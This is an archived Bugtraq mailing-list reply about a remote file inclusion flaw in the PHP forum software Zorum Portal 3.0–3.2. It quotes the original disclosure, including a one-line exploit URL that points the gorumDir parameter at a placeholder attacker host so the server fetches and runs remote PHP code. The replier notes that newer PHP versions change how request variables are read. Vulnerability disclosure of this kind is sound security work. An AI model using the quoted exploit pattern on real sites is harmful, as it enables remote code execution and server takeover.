Re[2]: Zorum Portal (PHP)

• Previous message: iDEFENSE Labs: "iDEFENSE Security Advisory 01.28.03: SSH2 Clients Insecurely Store Passwords"
• In reply to: Frog Man: "Re: Zorum Portal (PHP)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello MGHz,

>>From: MGhz <magasat_private>
>>To: bugtraqat_private
>>Subject: Zorum Portal  (PHP)
>>Date: 22 Jan 2003 19:45:26 -0000
>>
>>
>>
>>Version : 3.0;3.1;3.2
>>Website : http://zorum.phpoutsourcing.com/
>>Problem : Include file
>>
>>
>>File:
>>---------------------------------
>>include.php
>>---------------------------------
>>
>>PHP Code:
>>---------------------------------
>>[...]
>>include("$gorumDir/generformlib_multipleselection.php");
>>include("$gorumDir/generformlib_groupselection.php");
>>include("$gorumDir/generformlib_filebutton.php");
>>include("$gorumDir/group.php");
>>[...]
>>---------------------------------
>>
>>Exploit :
>>---------------------------------
>>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>>-->
>>include http://[attacker]/group.php on remote server
>>---------------------------------
>>
>>--
>>magasat_private

In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:

$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST


// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""

Messer.

• Next message: David Litchfield: "Re: David Litchfield talks about the SQL Worm in the Washington Post"
• Previous message: iDEFENSE Labs: "iDEFENSE Security Advisory 01.28.03: SSH2 Clients Insecurely Store Passwords"
• In reply to: Frog Man: "Re: Zorum Portal (PHP)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 12:02:54 PST